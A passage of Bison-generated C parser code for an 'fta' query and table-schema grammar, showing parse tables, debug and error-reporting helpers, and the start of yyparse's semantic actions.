3, 80, 70, 17, 112, 70, 72, 3, 4, 74,
96, 97, 98, 99, 27, 70, 27, 27, 27, 27,
39, 100, 101, 112, 112, 112, 112, 112, 112, 112,
112, 3, 112, 3, 134, 135, 124, 112, 124, 3,
4, 23, 89, 23, 3, 137, 74, 138, 3, 3,
140, 22, 84, 3, 21, 23, 65, 71, 72, 73,
3, 72, 114, 72, 72, 17, 112, 73, 73, 3,
71, 3, 96, 124, 96, 96, 96, 96, 3, 10,
70, 107, 108, 109, 110, 112, 34, 116, 25, 3,
23, 135, 95, 21, 21, 3, 4, 5, 71, 72,
140, 22, 71, 72, 134, 23, 5, 131, 136, 112,
3, 72, 72, 72, 3, 99, 3, 75, 97, 71,
74, 107, 107, 112, 8, 9, 11, 36, 24, 40,
117, 3, 3, 136, 3, 75, 134, 3, 23, 67,
73, 73, 73, 5, 75, 114, 72, 107, 107, 112,
74, 3, 46, 47, 48, 112, 119, 120, 122, 3,
126, 127, 35, 105, 106, 136, 21, 3, 4, 5,
23, 22, 99, 99, 99, 72, 75, 111, 115, 73,
70, 70, 70, 25, 71, 71, 71, 107, 41, 102,
138, 134, 27, 71, 75, 3, 121, 122, 121, 70,
118, 3, 119, 126, 126, 107, 42, 103, 21, 23,
96, 115, 73, 71, 72, 72, 121, 71, 72, 107,
43, 104, 68, 3, 122, 72, 70, 107, 22, 121,
3, 132, 133, 72, 70, 21, 23, 3, 141, 133,
69, 3, 71, 72, 136, 136, 3, 23, 3, 136
};
/* YYR1[YYN] -- Symbol number of symbol that rule YYN derives. */
/* Generated table: maps each grammar rule number to the internal
   symbol number of its left-hand-side nonterminal.  Used by the
   reduce step to compute the goto state. */
static const yytype_uint8 yyr1[] =
{
0, 82, 83, 83, 83, 84, 84, 84, 84, 84,
84, 84, 84, 84, 84, 84, 84, 84, 84, 84,
85, 85, 86, 86, 87, 87, 88, 88, 89, 89,
90, 91, 91, 92, 93, 94, 95, 95, 95, 95,
95, 95, 95, 96, 96, 97, 97, 98, 98, 98,
98, 98, 99, 99, 100, 100, 101, 102, 102, 103,
103, 104, 104, 105, 105, 106, 107, 107, 107, 107,
107, 108, 108, 108, 108, 109, 110, 111, 111, 112,
112, 112, 112, 112, 112, 112, 112, 112, 112, 112,
112, 112, 112, 112, 112, 112, 112, 112, 112, 112,
112, 112, 112, 112, 113, 113, 113, 113, 114, 114,
115, 115, 115, 115, 115, 115, 115, 115, 115, 115,
115, 115, 116, 116, 117, 117, 118, 118, 119, 119,
119, 119, 120, 120, 121, 121, 122, 122, 122, 122,
123, 123, 124, 124, 124, 125, 125, 126, 127, 127,
128, 128, 129, 129, 129, 129, 130, 130, 131, 132,
132, 133, 134, 134, 135, 135, 136, 136, 137, 137,
137, 137, 137, 137, 137, 137, 138, 138, 139, 139,
140, 140, 141, 141
};
/* YYR2[YYN] -- Number of symbols on the right hand side of rule YYN. */
/* Generated table: the reduce step pops yyr2[yyn] entries off the
   state and value stacks before pushing the rule's result. */
static const yytype_uint8 yyr2[] =
{
0, 2, 1, 1, 5, 3, 3, 2, 2, 1,
3, 3, 2, 2, 1, 3, 3, 2, 2, 1,
1, 3, 4, 3, 4, 3, 1, 2, 3, 3,
3, 3, 5, 5, 1, 8, 2, 3, 3, 3,
3, 3, 8, 1, 3, 1, 2, 1, 3, 5,
5, 5, 1, 3, 0, 1, 2, 0, 2, 0,
2, 0, 2, 0, 1, 2, 3, 3, 2, 3,
1, 1, 1, 3, 4, 3, 5, 1, 3, 3,
3, 3, 3, 3, 3, 3, 3, 2, 2, 2,
2, 1, 2, 1, 1, 3, 4, 4, 4, 3,
5, 5, 5, 4, 1, 3, 3, 5, 1, 3,
1, 1, 1, 1, 1, 1, 2, 2, 2, 2,
2, 2, 0, 3, 0, 2, 3, 5, 1, 4,
4, 4, 1, 3, 1, 3, 1, 3, 5, 3,
2, 4, 1, 3, 5, 3, 3, 1, 3, 3,
1, 2, 7, 6, 16, 4, 1, 3, 3, 1,
3, 4, 1, 2, 6, 4, 0, 3, 1, 2,
2, 2, 3, 4, 4, 4, 0, 3, 0, 3,
1, 3, 3, 5
};
/* Error-recovery helpers usable from semantic actions: yyerrok resumes
   normal error reporting, yyclearin discards the current lookahead. */
#define yyerrok (yyerrstatus = 0)
#define yyclearin (yychar = YYEMPTY)
/* Sentinel lookahead values: YYEMPTY = no token read yet, YYEOF = end
   of input. */
#define YYEMPTY (-2)
#define YYEOF 0
/* Jump targets used by the parser skeleton to terminate or recover. */
#define YYACCEPT goto yyacceptlab
#define YYABORT goto yyabortlab
#define YYERROR goto yyerrorlab
#define YYRECOVERING() (!!yyerrstatus)
/* YYBACKUP(Token, Value): in a semantic action, un-read the pending
   lookahead slot by installing Token/Value as the new lookahead; fails
   with a syntax error if a lookahead is already present. */
#define YYBACKUP(Token, Value) \
do \
if (yychar == YYEMPTY) \
{ \
yychar = (Token); \
yylval = (Value); \
YYPOPSTACK (yylen); \
yystate = *yyssp; \
goto yybackup; \
} \
else \
{ \
yyerror (YY_("syntax error: cannot back up")); \
YYERROR; \
} \
while (0)
/* Error token number */
#define YYTERROR 1
#define YYERRCODE 256
/* Enable debugging if requested. */
#if YYDEBUG
# ifndef YYFPRINTF
# include <stdio.h> /* INFRINGES ON USER NAME SPACE */
# define YYFPRINTF fprintf
# endif
/* YYDPRINTF: emit a trace line on stderr when yydebug is nonzero. */
# define YYDPRINTF(Args) \
do { \
if (yydebug) \
YYFPRINTF Args; \
} while (0)
/* This macro is provided for backward compatibility. */
#ifndef YY_LOCATION_PRINT
# define YY_LOCATION_PRINT(File, Loc) ((void) 0)
#endif
/* YY_SYMBOL_PRINT: trace one symbol (the Location argument is
   accepted for API compatibility but not expanded here). */
# define YY_SYMBOL_PRINT(Title, Type, Value, Location) \
do { \
if (yydebug) \
{ \
YYFPRINTF (stderr, "%s ", Title); \
yy_symbol_print (stderr, \
Type, Value); \
YYFPRINTF (stderr, "\n"); \
} \
} while (0)
/*----------------------------------------.
| Print this symbol's value on YYOUTPUT. |
`----------------------------------------*/
/* Debug helper: prints the semantic value *yyvaluep of a symbol of
   internal type yytype to YYOUTPUT.  Unless the grammar defines
   YYPRINT, this prints nothing (values are opaque to the skeleton). */
static void
yy_symbol_value_print (FILE *yyoutput, int yytype, YYSTYPE const * const yyvaluep)
{
FILE *yyo = yyoutput;
YYUSE (yyo);
/* A null value pointer means there is nothing to print. */
if (!yyvaluep)
return;
# ifdef YYPRINT
/* Only terminals (symbol number below YYNTOKENS) have token numbers. */
if (yytype < YYNTOKENS)
YYPRINT (yyoutput, yytoknum[yytype], *yyvaluep);
# endif
YYUSE (yytype);
}
/*--------------------------------.
| Print this symbol on YYOUTPUT. |
`--------------------------------*/
/* Debug helper: prints "token NAME (value)" or "nterm NAME (value)"
   for the symbol with internal number yytype, looking the name up in
   the generated yytname table. */
static void
yy_symbol_print (FILE *yyoutput, int yytype, YYSTYPE const * const yyvaluep)
{
YYFPRINTF (yyoutput, "%s %s (",
yytype < YYNTOKENS ? "token" : "nterm", yytname[yytype]);
yy_symbol_value_print (yyoutput, yytype, yyvaluep);
YYFPRINTF (yyoutput, ")");
}
/*------------------------------------------------------------------.
| yy_stack_print -- Print the state stack from its BOTTOM up to its |
| TOP (included).                                                   |
`------------------------------------------------------------------*/
/* Debug helper: dumps the parser's state stack (state numbers only)
   to stderr as a single "Stack now ..." line. */
static void
yy_stack_print (yytype_int16 *yybottom, yytype_int16 *yytop)
{
YYFPRINTF (stderr, "Stack now");
for (; yybottom <= yytop; yybottom++)
{
int yybot = *yybottom;
YYFPRINTF (stderr, " %d", yybot);
}
YYFPRINTF (stderr, "\n");
}
/* YY_STACK_PRINT: dump the state stack only when yydebug is set. */
# define YY_STACK_PRINT(Bottom, Top) \
do { \
if (yydebug) \
yy_stack_print ((Bottom), (Top)); \
} while (0)
/*------------------------------------------------.
| Report that the YYRULE is going to be reduced. |
`------------------------------------------------*/
/* Debug helper: before a reduction, prints the rule number, its source
   line in the grammar (yyrline), and each right-hand-side symbol with
   its semantic value, read back from the top of the stacks. */
static void
yy_reduce_print (yytype_int16 *yyssp, YYSTYPE *yyvsp, int yyrule)
{
unsigned long int yylno = yyrline[yyrule];
int yynrhs = yyr2[yyrule];
int yyi;
YYFPRINTF (stderr, "Reducing stack by rule %d (line %lu):\n",
yyrule - 1, yylno);
/* The symbols being reduced. */
for (yyi = 0; yyi < yynrhs; yyi++)
{
YYFPRINTF (stderr, " $%d = ", yyi + 1);
/* yyssp/yyvsp point at the stack tops; index back over the yynrhs
   RHS symbols, using yystos to recover each symbol's type. */
yy_symbol_print (stderr,
yystos[yyssp[yyi + 1 - yynrhs]],
&(yyvsp[(yyi + 1) - (yynrhs)])
);
YYFPRINTF (stderr, "\n");
}
}
/* YY_REDUCE_PRINT: trace a reduction only when yydebug is set. */
# define YY_REDUCE_PRINT(Rule) \
do { \
if (yydebug) \
yy_reduce_print (yyssp, yyvsp, Rule); \
} while (0)
/* Nonzero means print parse trace. It is left uninitialized so that
multiple parsers can coexist. */
int yydebug;
#else /* !YYDEBUG */
/* Non-debug build: all trace macros expand to nothing. */
# define YYDPRINTF(Args)
# define YY_SYMBOL_PRINT(Title, Type, Value, Location)
# define YY_STACK_PRINT(Bottom, Top)
# define YY_REDUCE_PRINT(Rule)
#endif /* !YYDEBUG */
/* YYINITDEPTH -- initial size of the parser's stacks. */
#ifndef YYINITDEPTH
# define YYINITDEPTH 200
#endif
/* YYMAXDEPTH -- maximum size the stacks can grow to (effective only
if the built-in stack extension method is used).
Do not make this value too large; the results are undefined if
YYSTACK_ALLOC_MAXIMUM < YYSTACK_BYTES (YYMAXDEPTH)
evaluated with infinite-precision integer arithmetic. */
#ifndef YYMAXDEPTH
# define YYMAXDEPTH 10000
#endif
#if YYERROR_VERBOSE
# ifndef yystrlen
# if defined __GLIBC__ && defined _STRING_H
# define yystrlen strlen
# else
/* Return the length of YYSTR. */
/* Return the length of YYSTR.  Portable strlen replacement used when
   the C library's strlen cannot be assumed. */
static YYSIZE_T
yystrlen (const char *yystr)
{
  const char *yyend = yystr;
  while (*yyend != '\0')
    ++yyend;
  return (YYSIZE_T) (yyend - yystr);
}
# endif
# endif
# ifndef yystpcpy
# if defined __GLIBC__ && defined _STRING_H && defined _GNU_SOURCE
# define yystpcpy stpcpy
# else
/* Copy YYSRC to YYDEST, returning the address of the terminating '\0' in
YYDEST. */
/* Copy YYSRC (including its terminating '\0') into YYDEST and return
   the address of the terminating '\0' in YYDEST.  Portable stpcpy
   replacement. */
static char *
yystpcpy (char *yydest, const char *yysrc)
{
  char *yyout = yydest;
  for (;;)
    {
      char yyc = *yysrc++;
      *yyout = yyc;
      if (yyc == '\0')
        return yyout;
      ++yyout;
    }
}
# endif
# endif
# ifndef yytnamerr
/* Copy to YYRES the contents of YYSTR after stripping away unnecessary
quotes and backslashes, so that it's suitable for yyerror. The
heuristic is that double-quoting is unnecessary unless the string
contains an apostrophe, a comma, or backslash (other than
backslash-backslash). YYSTR is taken from yytname. If YYRES is
null, do not copy; instead, return the length of what the result
would have been. */
/* Copies the symbol name YYSTR into YYRES with Bison's double-quote
   stripping applied; if YYRES is null, only the required length is
   returned.  Quoted names containing an apostrophe, comma, or a
   non-doubled backslash are copied verbatim instead of stripped. */
static YYSIZE_T
yytnamerr (char *yyres, const char *yystr)
{
if (*yystr == '"')
{
YYSIZE_T yyn = 0;
char const *yyp = yystr;
for (;;)
switch (*++yyp)
{
case '\'':
case ',':
goto do_not_strip_quotes;
case '\\':
if (*++yyp != '\\')
goto do_not_strip_quotes;
/* Fall through. */
default:
if (yyres)
yyres[yyn] = *yyp;
yyn++;
break;
case '"':
/* Closing quote: terminate the stripped copy and report its
   length (the quotes themselves are dropped). */
if (yyres)
yyres[yyn] = '\0';
return yyn;
}
do_not_strip_quotes: ;
}
/* Unquoted (or unstrippable) name: plain measure or copy. */
if (! yyres)
return yystrlen (yystr);
return yystpcpy (yyres, yystr) - yyres;
}
# endif
/* Copy into *YYMSG, which is of size *YYMSG_ALLOC, an error message
about the unexpected token YYTOKEN for the state stack whose top is
YYSSP.
Return 0 if *YYMSG was successfully written. Return 1 if *YYMSG is
not large enough to hold the message. In that case, also set
*YYMSG_ALLOC to the required number of bytes. Return 2 if the
required number of bytes is too large to store. */
static int
yysyntax_error (YYSIZE_T *yymsg_alloc, char **yymsg,
yytype_int16 *yyssp, int yytoken)
{
YYSIZE_T yysize0 = yytnamerr (YY_NULLPTR, yytname[yytoken]);
YYSIZE_T yysize = yysize0;
enum { YYERROR_VERBOSE_ARGS_MAXIMUM = 5 };
/* Internationalized format string. */
const char *yyformat = YY_NULLPTR;
/* Arguments of yyformat. */
char const *yyarg[YYERROR_VERBOSE_ARGS_MAXIMUM];
/* Number of reported tokens (one for the "unexpected", one per
"expected"). */
int yycount = 0;
/* There are many possibilities here to consider:
- If this state is a consistent state with a default action, then
the only way this function was invoked is if the default action
is an error action. In that case, don't check for expected
tokens because there are none.
- The only way there can be no lookahead present (in yychar) is if
this state is a consistent state with a default action. Thus,
detecting the absence of a lookahead is sufficient to determine
that there is no unexpected or expected token to report. In that
case, just report a simple "syntax error".
- Don't assume there isn't a lookahead just because this state is a
consistent state with a default action. There might have been a
previous inconsistent state, consistent state with a non-default
action, or user semantic action that manipulated yychar.
- Of course, the expected token list depends on states to have
correct lookahead information, and it depends on the parser not
to perform extra reductions after fetching a lookahead from the
scanner and before detecting a syntax error. Thus, state merging
(from LALR or IELR) and default reductions corrupt the expected
token list. However, the list is correct for canonical LR with
one exception: it will still contain any token that will not be
accepted due to an error action in a later state.
*/
if (yytoken != YYEMPTY)
{
/* Scan the action row of the current state for tokens that would
   have been accepted, collecting up to four "expected" names. */
int yyn = yypact[*yyssp];
yyarg[yycount++] = yytname[yytoken];
if (!yypact_value_is_default (yyn))
{
/* Start YYX at -YYN if negative to avoid negative indexes in
YYCHECK. In other words, skip the first -YYN actions for
this state because they are default actions. */
int yyxbegin = yyn < 0 ? -yyn : 0;
/* Stay within bounds of both yycheck and yytname. */
int yychecklim = YYLAST - yyn + 1;
int yyxend = yychecklim < YYNTOKENS ? yychecklim : YYNTOKENS;
int yyx;
for (yyx = yyxbegin; yyx < yyxend; ++yyx)
if (yycheck[yyx + yyn] == yyx && yyx != YYTERROR
&& !yytable_value_is_error (yytable[yyx + yyn]))
{
/* Too many candidates: fall back to a bare "syntax error,
   unexpected %s" message. */
if (yycount == YYERROR_VERBOSE_ARGS_MAXIMUM)
{
yycount = 1;
yysize = yysize0;
break;
}
yyarg[yycount++] = yytname[yyx];
{
YYSIZE_T yysize1 = yysize + yytnamerr (YY_NULLPTR, yytname[yyx]);
if (! (yysize <= yysize1
&& yysize1 <= YYSTACK_ALLOC_MAXIMUM))
return 2;
yysize = yysize1;
}
}
}
}
/* Pick the format string matching the number of collected names. */
switch (yycount)
{
# define YYCASE_(N, S) \
case N: \
yyformat = S; \
break
YYCASE_(0, YY_("syntax error"));
YYCASE_(1, YY_("syntax error, unexpected %s"));
YYCASE_(2, YY_("syntax error, unexpected %s, expecting %s"));
YYCASE_(3, YY_("syntax error, unexpected %s, expecting %s or %s"));
YYCASE_(4, YY_("syntax error, unexpected %s, expecting %s or %s or %s"));
YYCASE_(5, YY_("syntax error, unexpected %s, expecting %s or %s or %s or %s"));
# undef YYCASE_
}
{
YYSIZE_T yysize1 = yysize + yystrlen (yyformat);
if (! (yysize <= yysize1 && yysize1 <= YYSTACK_ALLOC_MAXIMUM))
return 2;
yysize = yysize1;
}
/* Grow the caller's buffer (caller reallocates and retries). */
if (*yymsg_alloc < yysize)
{
*yymsg_alloc = 2 * yysize;
if (! (yysize <= *yymsg_alloc
&& *yymsg_alloc <= YYSTACK_ALLOC_MAXIMUM))
*yymsg_alloc = YYSTACK_ALLOC_MAXIMUM;
return 1;
}
/* Avoid sprintf, as that infringes on the user's name space.
Don't have undefined behavior even if the translation
produced a string with the wrong number of "%s"s. */
{
char *yyp = *yymsg;
int yyi = 0;
while ((*yyp = *yyformat) != '\0')
if (*yyp == '%' && yyformat[1] == 's' && yyi < yycount)
{
yyp += yytnamerr (yyp, yyarg[yyi++]);
yyformat += 2;
}
else
{
yyp++;
yyformat++;
}
}
return 0;
}
#endif /* YYERROR_VERBOSE */
/*-----------------------------------------------.
| Release the memory associated to this symbol. |
`-----------------------------------------------*/
/* Invoked when a symbol is discarded during error recovery or parser
   cleanup; runs any %destructor actions for the symbol (none visible
   here -- the body only logs and suppresses unused-value warnings). */
static void
yydestruct (const char *yymsg, int yytype, YYSTYPE *yyvaluep)
{
YYUSE (yyvaluep);
if (!yymsg)
yymsg = "Deleting";
/* NOTE(review): `yylocationp` is not declared in this scope; it
   compiles because YY_SYMBOL_PRINT never expands its Location
   argument -- confirm before enabling location tracking. */
YY_SYMBOL_PRINT (yymsg, yytype, yyvaluep, yylocationp);
YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN
YYUSE (yytype);
YY_IGNORE_MAYBE_UNINITIALIZED_END
}
/* The lookahead symbol. */
/* Shared between yyparse and yylex/semantic actions (single-parser,
   non-reentrant skeleton). */
int yychar;
/* The semantic value of the lookahead symbol. */
YYSTYPE yylval;
/* Number of syntax errors so far. */
int yynerrs;
/*----------.
| yyparse. |
`----------*/
int
yyparse (void)
{
int yystate;
/* Number of tokens to shift before error messages enabled. */
int yyerrstatus;
/* The stacks and their tools:
'yyss': related to states.
'yyvs': related to semantic values.
Refer to the stacks through separate pointers, to allow yyoverflow
to reallocate them elsewhere. */
/* The state stack. */
yytype_int16 yyssa[YYINITDEPTH];
yytype_int16 *yyss;
yytype_int16 *yyssp;
/* The semantic value stack. */
YYSTYPE yyvsa[YYINITDEPTH];
YYSTYPE *yyvs;
YYSTYPE *yyvsp;
YYSIZE_T yystacksize;
int yyn;
int yyresult;
/* Lookahead token as an internal (translated) token number. */
int yytoken = 0;
/* The variables used to return semantic value and location from the
action routines. */
YYSTYPE yyval;
#if YYERROR_VERBOSE
/* Buffer for error messages, and its allocated size. */
char yymsgbuf[128];
char *yymsg = yymsgbuf;
YYSIZE_T yymsg_alloc = sizeof yymsgbuf;
#endif
#define YYPOPSTACK(N) (yyvsp -= (N), yyssp -= (N))
/* The number of symbols on the RHS of the reduced rule.
Keep to zero when no symbol should be popped. */
int yylen = 0;
yyssp = yyss = yyssa;
yyvsp = yyvs = yyvsa;
yystacksize = YYINITDEPTH;
YYDPRINTF ((stderr, "Starting parse\n"));
yystate = 0;
yyerrstatus = 0;
yynerrs = 0;
yychar = YYEMPTY; /* Cause a token to be read. */
goto yysetstate;
/*------------------------------------------------------------.
| yynewstate -- Push a new state, which is found in yystate. |
`------------------------------------------------------------*/
yynewstate:
/* In all cases, when you get here, the value and location stacks
have just been pushed. So pushing a state here evens the stacks. */
yyssp++;
yysetstate:
*yyssp = yystate;
if (yyss + yystacksize - 1 <= yyssp)
{
/* Get the current used size of the three stacks, in elements. */
YYSIZE_T yysize = yyssp - yyss + 1;
#ifdef yyoverflow
{
/* Give user a chance to reallocate the stack. Use copies of
these so that the &'s don't force the real ones into
memory. */
YYSTYPE *yyvs1 = yyvs;
yytype_int16 *yyss1 = yyss;
/* Each stack pointer address is followed by the size of the
data in use in that stack, in bytes. This used to be a
conditional around just the two extra args, but that might
be undefined if yyoverflow is a macro. */
yyoverflow (YY_("memory exhausted"),
&yyss1, yysize * sizeof (*yyssp),
&yyvs1, yysize * sizeof (*yyvsp),
&yystacksize);
yyss = yyss1;
yyvs = yyvs1;
}
#else /* no yyoverflow */
# ifndef YYSTACK_RELOCATE
goto yyexhaustedlab;
# else
/* Extend the stack our own way. */
if (YYMAXDEPTH <= yystacksize)
goto yyexhaustedlab;
yystacksize *= 2;
if (YYMAXDEPTH < yystacksize)
yystacksize = YYMAXDEPTH;
{
yytype_int16 *yyss1 = yyss;
union yyalloc *yyptr =
(union yyalloc *) YYSTACK_ALLOC (YYSTACK_BYTES (yystacksize));
if (! yyptr)
goto yyexhaustedlab;
YYSTACK_RELOCATE (yyss_alloc, yyss);
YYSTACK_RELOCATE (yyvs_alloc, yyvs);
# undef YYSTACK_RELOCATE
if (yyss1 != yyssa)
YYSTACK_FREE (yyss1);
}
# endif
#endif /* no yyoverflow */
yyssp = yyss + yysize - 1;
yyvsp = yyvs + yysize - 1;
YYDPRINTF ((stderr, "Stack size increased to %lu\n",
(unsigned long int) yystacksize));
if (yyss + yystacksize - 1 <= yyssp)
YYABORT;
}
YYDPRINTF ((stderr, "Entering state %d\n", yystate));
if (yystate == YYFINAL)
YYACCEPT;
goto yybackup;
/*-----------.
| yybackup. |
`-----------*/
yybackup:
/* Do appropriate processing given the current state. Read a
lookahead token if we need one and don't already have one. */
/* First try to decide what to do without reference to lookahead token. */
yyn = yypact[yystate];
if (yypact_value_is_default (yyn))
goto yydefault;
/* Not known => get a lookahead token if don't already have one. */
/* YYCHAR is either YYEMPTY or YYEOF or a valid lookahead symbol. */
if (yychar == YYEMPTY)
{
YYDPRINTF ((stderr, "Reading a token: "));
yychar = yylex ();
}
if (yychar <= YYEOF)
{
yychar = yytoken = YYEOF;
YYDPRINTF ((stderr, "Now at end of input.\n"));
}
else
{
yytoken = YYTRANSLATE (yychar);
YY_SYMBOL_PRINT ("Next token is", yytoken, &yylval, &yylloc);
}
/* If the proper action on seeing token YYTOKEN is to reduce or to
detect an error, take that action. */
yyn += yytoken;
if (yyn < 0 || YYLAST < yyn || yycheck[yyn] != yytoken)
goto yydefault;
yyn = yytable[yyn];
if (yyn <= 0)
{
if (yytable_value_is_error (yyn))
goto yyerrlab;
yyn = -yyn;
goto yyreduce;
}
/* Count tokens shifted since error; after three, turn off error
status. */
if (yyerrstatus)
yyerrstatus--;
/* Shift the lookahead token. */
YY_SYMBOL_PRINT ("Shifting", yytoken, &yylval, &yylloc);
/* Discard the shifted token. */
yychar = YYEMPTY;
yystate = yyn;
YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN
*++yyvsp = yylval;
YY_IGNORE_MAYBE_UNINITIALIZED_END
goto yynewstate;
/*-----------------------------------------------------------.
| yydefault -- do the default action for the current state. |
`-----------------------------------------------------------*/
yydefault:
yyn = yydefact[yystate];
if (yyn == 0)
goto yyerrlab;
goto yyreduce;
/*-----------------------------.
| yyreduce -- Do a reduction. |
`-----------------------------*/
yyreduce:
/* yyn is the number of a rule to reduce with. */
yylen = yyr2[yyn];
/* If YYLEN is nonzero, implement the default value of the action:
'$$ = $1'.
Otherwise, the following line sets YYVAL to garbage.
This behavior is undocumented and Bison
users should not rely upon it. Assigning to YYVAL
unconditionally makes the parser a bit smaller, and it avoids a
GCC warning that YYVAL may be used uninitialized. */
yyval = yyvsp[1-yylen];
YY_REDUCE_PRINT (yyn);
switch (yyn)
{
case 2:
#line 206 "fta.y" /* yacc.c:1646 */
{
fta_parse_result->parse_tree_list = (yyvsp[0].q_list);
fta_parse_result->tables = NULL;
fta_parse_result->parse_type = QUERY_PARSE;
}
#line 1699 "fta.tab.cc" /* yacc.c:1646 */
break;
case 3:
#line 211 "fta.y" /* yacc.c:1646 */
{
fta_parse_result->parse_tree_list = NULL;
fta_parse_result->fta_parse_tree = NULL;
fta_parse_result->tables = (yyvsp[0].table_list_schema);
fta_parse_result->parse_type = TABLE_PARSE;
}
#line 1710 "fta.tab.cc" /* yacc.c:1646 */
break;
case 4:
#line 218 "fta.y" /* yacc.c:1646 */
{
fta_parse_result->parse_tree_list = NULL;
fta_parse_result->fta_parse_tree = (yyvsp[-1].tblp);
fta_parse_result->tables = (yyvsp[-2].table_list_schema);
fta_parse_result->parse_type = STREAM_PARSE;
}
#line 1721 "fta.tab.cc" /* yacc.c:1646 */
break;
case 5:
#line 232 "fta.y" /* yacc.c:1646 */
{
(yyvsp[0].tblp)->add_nmap((yyvsp[-2].var_defs)); // Memory leak : plug it.
(yyvsp[0].tblp)->add_param_list((yyvsp[-1].var_defs)); // Memory leak : plug it.
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1731 "fta.tab.cc" /* yacc.c:1646 */
break;
case 6:
#line 237 "fta.y" /* yacc.c:1646 */
{
(yyvsp[0].tblp)->add_nmap((yyvsp[-1].var_defs)); // Memory leak : plug it.
(yyvsp[0].tblp)->add_param_list((yyvsp[-2].var_defs)); // Memory leak : plug it.
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1741 "fta.tab.cc" /* yacc.c:1646 */
break;
case 7:
#line 242 "fta.y" /* yacc.c:1646 */
{
(yyvsp[0].tblp)->add_nmap(NULL); // Memory leak : plug it.
(yyvsp[0].tblp)->add_param_list((yyvsp[-1].var_defs)); // Memory leak : plug it.
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1751 "fta.tab.cc" /* yacc.c:1646 */
break;
case 8:
#line 247 "fta.y" /* yacc.c:1646 */
{
(yyvsp[0].tblp)->add_nmap((yyvsp[-1].var_defs)); // Memory leak : plug it.
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1760 "fta.tab.cc" /* yacc.c:1646 */
break;
case 9:
#line 251 "fta.y" /* yacc.c:1646 */
{
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1768 "fta.tab.cc" /* yacc.c:1646 */
break;
case 10:
#line 254 "fta.y" /* yacc.c:1646 */
{
(yyvsp[0].tblp)->add_nmap((yyvsp[-2].var_defs)); // Memory leak : plug it.
(yyvsp[0].tblp)->add_param_list((yyvsp[-1].var_defs)); // Memory leak : plug it.
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1778 "fta.tab.cc" /* yacc.c:1646 */
break;
case 11:
#line 259 "fta.y" /* yacc.c:1646 */
{
(yyvsp[0].tblp)->add_nmap((yyvsp[-1].var_defs)); // Memory leak : plug it.
(yyvsp[0].tblp)->add_param_list((yyvsp[-2].var_defs)); // Memory leak : plug it.
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1788 "fta.tab.cc" /* yacc.c:1646 */
break;
case 12:
#line 264 "fta.y" /* yacc.c:1646 */
{
(yyvsp[0].tblp)->add_param_list((yyvsp[-1].var_defs)); // Memory leak : plug it.
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1797 "fta.tab.cc" /* yacc.c:1646 */
break;
case 13:
#line 268 "fta.y" /* yacc.c:1646 */
{
(yyvsp[0].tblp)->add_nmap((yyvsp[-1].var_defs)); // Memory leak : plug it.
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1806 "fta.tab.cc" /* yacc.c:1646 */
break;
case 14:
#line 272 "fta.y" /* yacc.c:1646 */
{
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1814 "fta.tab.cc" /* yacc.c:1646 */
break;
case 15:
#line 275 "fta.y" /* yacc.c:1646 */
{
(yyvsp[0].tblp)->add_nmap((yyvsp[-2].var_defs)); // Memory leak : plug it.
(yyvsp[0].tblp)->add_param_list((yyvsp[-1].var_defs)); // Memory leak : plug it.
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1824 "fta.tab.cc" /* yacc.c:1646 */
break;
case 16:
#line 280 "fta.y" /* yacc.c:1646 */
{
(yyvsp[0].tblp)->add_nmap((yyvsp[-1].var_defs)); // Memory leak : plug it.
(yyvsp[0].tblp)->add_param_list((yyvsp[-2].var_defs)); // Memory leak : plug it.
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1834 "fta.tab.cc" /* yacc.c:1646 */
break;
case 17:
#line 285 "fta.y" /* yacc.c:1646 */
{
(yyvsp[0].tblp)->add_param_list((yyvsp[-1].var_defs)); // Memory leak : plug it.
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1843 "fta.tab.cc" /* yacc.c:1646 */
break;
case 18:
#line 289 "fta.y" /* yacc.c:1646 */
{
(yyvsp[0].tblp)->add_nmap((yyvsp[-1].var_defs)); // Memory leak : plug it.
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1852 "fta.tab.cc" /* yacc.c:1646 */
break;
case 19:
#line 293 "fta.y" /* yacc.c:1646 */
{
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1860 "fta.tab.cc" /* yacc.c:1646 */
break;
case 20:
#line 298 "fta.y" /* yacc.c:1646 */
{(yyval.q_list) = new query_list_t((yyvsp[0].tblp));}
#line 1866 "fta.tab.cc" /* yacc.c:1646 */
break;
case 21:
#line 299 "fta.y" /* yacc.c:1646 */
{(yyval.q_list) = (yyvsp[-2].q_list)->append((yyvsp[0].tblp));}
#line 1872 "fta.tab.cc" /* yacc.c:1646 */
break;
case 22:
#line 303 "fta.y" /* yacc.c:1646 */
{(yyval.var_defs)=(yyvsp[-1].var_defs);}
#line 1878 "fta.tab.cc" /* yacc.c:1646 */
break;
case 23:
#line 304 "fta.y" /* yacc.c:1646 */
{(yyval.var_defs)=NULL;}
#line 1884 "fta.tab.cc" /* yacc.c:1646 */
break;
case 24:
#line 308 "fta.y" /* yacc.c:1646 */
{(yyval.var_defs)=(yyvsp[-1].var_defs);fta_parse_defines=(yyvsp[-1].var_defs);}
#line 1890 "fta.tab.cc" /* yacc.c:1646 */
break;
case 25:
#line 309 "fta.y" /* yacc.c:1646 */
{(yyval.var_defs)=NULL;fta_parse_defines = NULL;}
#line 1896 "fta.tab.cc" /* yacc.c:1646 */
break;
case 26:
#line 313 "fta.y" /* yacc.c:1646 */
{(yyval.var_defs) = new var_defs_t((yyvsp[0].var_pair));}
#line 1902 "fta.tab.cc" /* yacc.c:1646 */
break;
case 27:
#line 314 "fta.y" /* yacc.c:1646 */
{(yyval.var_defs) = (yyvsp[-1].var_defs)->add_var_pair((yyvsp[0].var_pair));}
#line 1908 "fta.tab.cc" /* yacc.c:1646 */
break;
case 28:
#line 318 "fta.y" /* yacc.c:1646 */
